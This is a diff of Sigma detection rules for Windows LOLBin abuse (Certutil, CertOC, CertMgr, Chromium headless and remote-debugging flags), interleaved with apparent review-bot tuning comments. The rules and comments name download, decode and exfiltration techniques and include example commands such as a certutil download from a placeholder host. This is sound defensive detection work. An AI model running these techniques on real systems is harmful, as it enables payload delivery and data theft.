diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml
index d8888f884..119c0bd7f 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml
@@ -1,9 +1,7 @@
 title: Chromium Browser Headless Execution To Mockbin Like Site
 id: 1c526788-0abe-4713-862f-b520da5e5316
 status: experimental
-description: Detects the execution of a Chromium based browser process with the "headless"
- flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate
- data).
+description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
 references:
 - https://www.zscaler.com/blogs/security-research/steal-it-campaign
 author: X__Junior (Nextron Systems)
@@ -26,9 +24,9 @@ detection:
 - \opera.exe
 - \vivaldi.exe
 selection_headless:
- CommandLine|contains: --headless
+ CommandLine|contains: --headless
 selection_url:
- CommandLine|contains:
+ CommandLine|contains:
 - ://run.mocky
 - ://mockbin
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml
index 9f0ca3598..bd7c84a68 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml
@@ -1,11 +1,10 @@
 title: Suspicious Chromium Browser Instance Executed With Custom Extension
 id: 27ba3207-dd30-4812-abbf-5d20c57d474e
 related:
- - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21
- type: similar
+ - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21
+ type: similar
 status: experimental
-description: Detects a suspicious process spawning a Chromium based browser process
- with the 'load-extension' flag to start an instance with a custom extension
+description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
 references:
 - https://redcanary.com/blog/chromeloader/
 - https://emkc.org/s/RJjuLa
@@ -40,7 +39,7 @@ detection:
 - \msedge.exe
 - \opera.exe
 - \vivaldi.exe
- CommandLine|contains: --load-extension=
+ CommandLine|contains: --load-extension=
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_inline_file_download.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_inline_file_download.yml
index d5aacfa5c..fff9b52f4 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_browsers_inline_file_download.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_inline_file_download.yml
@@ -1,10 +1,7 @@
 title: File Download From Browser Process Via Inline URL
 id: 94771a71-ba41-4b6e-a757-b531372eaab6
 status: test
-description: Detects execution of a browser process with a URL argument pointing to
- a file with a potentially interesting extension. This can be abused to download
- arbitrary files or to hide from the user for example by launching the browser
- in a minimized state.
+description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
 references:
 - https://twitter.com/mrd0x/status/1478116126005641220
 - https://lolbas-project.github.io/lolbas/Binaries/Msedge/
@@ -30,9 +27,9 @@ detection:
 - \opera.exe
 - \vivaldi.exe
 selection_http:
- CommandLine|contains: http
+ CommandLine|contains: http
 selection_extensions:
- CommandLine|endswith:
+ CommandLine|endswith:
 - .7z
 - .dat
 - .dll
diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_remote_debugging.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_remote_debugging.yml
index 48a4fdcf5..65f238ea2 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_browsers_remote_debugging.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_remote_debugging.yml
@@ -1,11 +1,10 @@
 title: Browser Started with Remote Debugging
 id: b3d34dc5-2efd-4ae3-845f-8ec14921f449
 related:
- - id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4
- type: derived
+ - id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4
+ type: derived
 status: test
-description: Detects browsers starting with the remote debugging flags. Which is a
- technique often used to perform browser injection attacks
+description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
 references:
 - https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf
 - https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/
@@ -26,10 +25,11 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_chromium_based:
- CommandLine|contains: ' --remote-debugging-'
+ # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc
+ CommandLine|contains: ' --remote-debugging-'
 selection_firefox:
 Image|endswith: \firefox.exe
- CommandLine|contains: ' -start-debugger-server'
+ CommandLine|contains: ' -start-debugger-server'
 condition: process_creation and (1 of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_calc_uncommon_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_calc_uncommon_exec.yml
index bb8f456d0..a9d5ddb73 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_calc_uncommon_exec.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_calc_uncommon_exec.yml
@@ -1,11 +1,8 @@
 title: Suspicious Calculator Usage
 id: 737e618a-a410-49b5-bec3-9e55ff7fbc15
 status: test
-description: 'Detects suspicious use of ''calc.exe'' with command line parameters
- or in a suspicious directory, which is likely caused by some PoC or detection
- evasion.
-
- '
+description: |
+ Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
 references:
 - https://twitter.com/ItsReallyNick/status/1094080242686312448
 author: Florian Roth (Nextron Systems)
@@ -23,7 +20,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_1:
- CommandLine|contains: '\calc.exe '
+ CommandLine|contains: '\calc.exe '
 selection_2:
 Image|endswith: \calc.exe
 filter_main_known_locations:
@@ -31,8 +28,7 @@ detection:
 - :\Windows\System32\
 - :\Windows\SysWOW64\
 - :\Windows\WinSxS\
- condition: process_creation and (selection_1 or ( selection_2 and not filter_main_known_locations
- ))
+ condition: process_creation and (selection_1 or ( selection_2 and not filter_main_known_locations ))
 falsepositives:
 - Unknown
 level: high
diff --git a/sigma/sysmon/process_creation/proc_creation_win_certmgr_certificate_installation.yml b/sigma/sysmon/process_creation/proc_creation_win_certmgr_certificate_installation.yml
index 10df15e1d..212318b6c 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_certmgr_certificate_installation.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_certmgr_certificate_installation.yml
@@ -1,18 +1,14 @@
 title: New Root Certificate Installed Via CertMgr.EXE
 id: ff992eac-6449-4c60-8c1d-91c9722a1d48
 related:
- - id: 42821614-9264-4761-acfc-5772c3286f76
- type: derived
- - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc
- type: obsoletes
+ - id: 42821614-9264-4761-acfc-5772c3286f76
+ type: derived
+ - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc
+ type: obsoletes
 status: test
-description: 'Detects execution of "certmgr" with the "add" flag in order to install
- a new certificate on the system.
-
- Adversaries may install a root certificate on a compromised system to avoid warnings
- when connecting to adversary controlled web servers.
-
- '
+description: |
+ Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
+ Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
 - https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/
@@ -26,19 +22,19 @@ logsource:
 category: process_creation
 product: windows
 detection:
+ # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all
 process_creation:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \CertMgr.exe
- - OriginalFileName: CERTMGT.EXE
+ - Image|endswith: \CertMgr.exe
+ - OriginalFileName: CERTMGT.EXE
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - /add
 - root
 condition: process_creation and (all of selection_*)
 falsepositives:
- - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need
- to test if GPO push doesn't trigger FP
+ - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_certoc_download.yml b/sigma/sysmon/process_creation/proc_creation_win_certoc_download.yml
index bb0b78f2f..cf3bb6268 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_certoc_download.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_certoc_download.yml
@@ -1,8 +1,8 @@
 title: File Download via CertOC.EXE
 id: 70ad0861-d1fe-491c-a45f-fa48148a300d
 related:
- - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a
- type: similar
+ - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a
+ type: similar
 status: test
 description: Detects when a user downloads a file by using CertOC.exe
 references:
@@ -22,10 +22,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \certoc.exe
- - OriginalFileName: CertOC.exe
+ - Image|endswith: \certoc.exe
+ - OriginalFileName: CertOC.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - -GetCACAPS
 - http
 condition: process_creation and (all of selection*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_certoc_download_direct_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_certoc_download_direct_ip.yml
index 019b3df61..d7a1e1f67 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_certoc_download_direct_ip.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_certoc_download_direct_ip.yml
@@ -1,8 +1,8 @@
 title: File Download From IP Based URL Via CertOC.EXE
 id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a
 related:
- - id: 70ad0861-d1fe-491c-a45f-fa48148a300d
- type: similar
+ - id: 70ad0861-d1fe-491c-a45f-fa48148a300d
+ type: similar
 status: experimental
 description: Detects when a user downloads a file from an IP based URL using CertOC.exe
 references:
@@ -22,12 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - Image|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_cli: - CommandLine|contains: -GetCACAPS + CommandLine|contains: -GetCACAPS condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll.yml index 2b6a9668c..bd67b8f02 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll.yml @@ -1,11 +1,10 @@ title: DLL Loaded via CertOC.EXE id: 242301bc-f92f-4476-8718-78004a6efd9f related: - - id: 84232095-ecca-4015-b0d7-7726507ee793 - type: similar + - id: 84232095-ecca-4015-b0d7-7726507ee793 + type: similar status: test -description: Detects when a user installs certificates by using CertOC.exe to loads - the target DLL file. +description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. references: - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2 @@ -25,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - Image|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -LoadDLL ' - ' /LoadDLL ' condition: process_creation and (all of selection_*) 
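Review bot: The reflowed description in the `@@ -1,11 +1,10 @@` hunk of the load_dll rule ("installs certificates by using CertOC.exe to loads the target DLL file") is ungrammatical and does not describe what the selection checks: `selection_cli` keys only on `-LoadDLL` / `/LoadDLL`, which loads the DLL named on the command line into the certoc process, and no part of the rule relates to certificate installation. I would replace it with `description: Detects execution of CertOC.exe with the "-LoadDLL" / "/LoadDLL" flag, which loads the DLL given on the command line into the CertOC process and can be abused to proxy execution of attacker-supplied code (see references)`. The same sentence is carried into the sibling `proc_creation_win_certoc_load_dll_susp_locations.yml` rule and should be corrected there as well.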
diff --git a/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml b/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml index c6b67d63f..08109be71 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml @@ -1,11 +1,10 @@ title: Suspicious DLL Loaded via CertOC.EXE id: 84232095-ecca-4015-b0d7-7726507ee793 related: - - id: 242301bc-f92f-4476-8718-78004a6efd9f - type: similar + - id: 242301bc-f92f-4476-8718-78004a6efd9f + type: similar status: test -description: Detects when a user installs certificates by using CertOC.exe to load - the target DLL file. +description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file. references: - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2 @@ -24,14 +23,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - Image|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -LoadDLL ' - ' /LoadDLL ' selection_paths: - CommandLine|contains: + CommandLine|contains: - \Appdata\Local\Temp\ - \Desktop\ - \Downloads\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_certificate_installation.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_certificate_installation.yml index 1b050ce96..c5e432acc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_certificate_installation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_certificate_installation.yml 
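Review bot: `selection_paths` in the `@@ -24,14 +23,14 @@` hunk shows only three fragments (`\Appdata\Local\Temp\`, `\Desktop\`, `\Downloads\`) before the hunk ends, and the world-writable staging directories that LOLBin DLL loads are usually seen from — `\Users\Public\`, `\ProgramData\`, `\Windows\Temp\`, `\Windows\Tasks\` — are not among them; if they are not already further down the list outside this hunk, they should be added. Since the condition is `all of selection_*` (visible in the sibling load_dll rule), the extra entries only narrow the parent rule and cannot add noise beyond what `-LoadDLL` itself produces. A one-line comment such as `# Note: world-writable / user-profile drop locations; extend for your environment` above the list would make the intent clear to whoever tunes it.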
@@ -1,18 +1,14 @@ title: New Root Certificate Installed Via Certutil.EXE id: d2125259-ddea-4c1c-9c22-977eb5b29cf0 related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived - - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc - type: obsoletes + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived + - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc + type: obsoletes status: test -description: 'Detects execution of "certutil" with the "addstore" flag in order to - install a new certificate on the system. - - Adversaries may install a root certificate on a compromised system to avoid warnings - when connecting to adversary controlled web servers. - - ' +description: | + Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. + Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: oscd.community, @redcanary, Zach Stanford @svch0st 
@@ -25,21 +21,21 @@ logsource: category: process_creation product: windows detection: + # Example: certutil -addstore -f -user ROOT CertificateFileName.der process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli_add: - CommandLine|contains: + CommandLine|contains: - /addstore - -addstore selection_cli_store: - CommandLine|contains: root + CommandLine|contains: root condition: process_creation and (all of selection_*) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_decode.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_decode.yml index 29d399d8f..bfadd314c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_decode.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_decode.yml @@ -1,9 +1,7 @@ title: File Decoded From Base64/Hex Via Certutil.EXE id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7 status: test -description: Detects the execution of certutil with either the "decode" or "decodehex" - flags to decode base64 or hex encoded files. This can be abused by attackers to - decode an encoded payload before execution +description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ 
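Review bot: `selection_cli_store: CommandLine|contains: root` matches the substring anywhere, so `certutil -addstore CA C:\rootca\intermediate.cer` or a file named `rootcert.cer` added to `TrustedPublisher` is reported as a root-CA install. Per the example comment added in this hunk (`certutil -addstore -f -user ROOT CertificateFileName.der`) the store name is always followed by the input file, so `CommandLine|contains: - ' root '  - ' authroot '` (space-delimited, and including the third-party AuthRoot store the title implies) keeps the true positives while dropping path hits; a quoted store name like `"root"` would still escape this and needs a regex if you see it in your data. Note also that `-addstore` only covers the long-form switch — certutil prints the same verb for `-addstore` and `/addstore`, which the hunk handles, so no change is needed there.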
@@ -25,12 +23,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: + # Decode Base64 - '-decode ' - '/decode ' + # Decode Hex - '-decodehex ' - '/decodehex ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_download.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_download.yml index 61e1d2c51..055fa7fac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_download.yml @@ -1,19 +1,17 @@ title: Suspicious Download Via Certutil.EXE id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b related: - - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 - type: similar + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 + type: similar status: test -description: Detects the execution of certutil with certain flags that allow the utility - to download files. +description: Detects the execution of certutil with certain flags that allow the utility to download files. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/ - https://twitter.com/egre55/status/1087685529016193025 - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/02/15 tags: - attack.defense_evasion 
@@ -27,14 +25,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_download_direct_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_download_direct_ip.yml index 30d145a1e..b21069978 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_download_direct_ip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_download_direct_ip.yml @@ -1,13 +1,12 @@ title: Suspicious File Downloaded From Direct IP Via Certutil.EXE id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 related: - - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b - type: similar - - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 - type: similar + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download + type: similar + - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download + type: similar status: test -description: Detects the execution of certutil with certain flags that allow the utility - to download files from direct IPs. +description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ 
@@ -29,14 +28,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: + CommandLine|contains: - ://1 - ://2 - ://3 @@ -46,8 +45,31 @@ detection: - ://7 - ://8 - ://9 + # filter_local_ips: + # # Note: Uncomment this filter if you want to exclude local IPs + # CommandLine|contains: + # - '://10.' # 10.0.0.0/8 + # - '://192.168.' # 192.168.0.0/16 + # - '://172.16.' # 172.16.0.0/12 + # - '://172.17.' + # - '://172.18.' + # - '://172.19.' + # - '://172.20.' + # - '://172.21.' + # - '://172.22.' + # - '://172.23.' + # - '://172.24.' + # - '://172.25.' + # - '://172.26.' + # - '://172.27.' + # - '://172.28.' + # - '://172.29.' + # - '://172.30.' + # - '://172.31.' + # - '://127.' # 127.0.0.0/8 + # - '://169.254.' # 169.254.0.0/16 filter_main_seven_zip: - CommandLine|contains: ://7- + CommandLine|contains: ://7- # For https://7-zip.org/ condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml index 89e841296..819ea76ee 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml 
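Review bot: In the `@@ -46,8 +45,31 @@` hunk, `filter_main_seven_zip` excludes every URL whose host starts with `7-`, not just 7-zip.org, so `certutil -urlcache -f http://7-stage.example/x.exe` bypasses a rule whose whole purpose is catching bare-host/IP downloads. Narrow the filter to the legitimate host with `CommandLine|contains: '://7-zip.org/'`; `www.7-zip.org` does not need an entry because `://w` never matched the `://1`–`://9` selection in the first place. The commented-out `filter_local_ips` block is a reasonable opt-in, but the comment should warn that enabling it also hides downloads from attacker-controlled internal hosts (lateral tool transfer), which is a common use of certutil in intrusions.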
@@ -1,13 +1,12 @@ title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 related: - - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b - type: similar - - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 - type: similar + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download + type: similar + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 # Generic download + type: similar status: experimental -description: Detects the execution of certutil with certain flags that allow the utility - to download files from file-sharing websites. +description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ @@ -29,15 +28,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode.yml index d6acda12a..12a4e958c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode.yml 
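Review bot: In the second hunk's `selection_http`, the entry `cdn.discordapp.com/attachments/` is redundant: `contains` on the preceding `cdn.discordapp.com` already matches every command line the longer string could. If it is kept on purpose for readability, say so with a trailing comment (`# redundant with the entry above, kept for clarity`); otherwise drop it so the list reflects what actually adds coverage. The list continues past the end of this hunk, so I have not checked the remaining entries for the same pattern.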
@@ -1,14 +1,12 @@ title: File Encoded To Base64 Via Certutil.EXE id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a status: test -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64. This can be abused by threat actors and attackers for data exfiltration +description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/02/24 modified: 2023/02/15 tags: @@ -23,15 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode condition: process_creation and (all of selection_*) falsepositives: - - As this is a general purpose rule, legitimate usage of the encode functionality - will trigger some false positives. Apply additional filters accordingly + - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml index d953f1c22..e8a960ac5 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml @@ -1,11 +1,10 @@ title: Suspicious File Encoded To Base64 Via Certutil.EXE id: ea0cdc3e-2239-4f26-a947-4e8f8224e464 related: - - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a - type: derived + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + type: derived status: experimental -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64 where the extensions of the file is suspicious +description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious references: - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior @@ -25,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode selection_extension: - CommandLine|contains: + CommandLine|contains: - .acl - .bat - .doc diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_location.yml index 342f2fbe2..dbe5df99f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_location.yml 
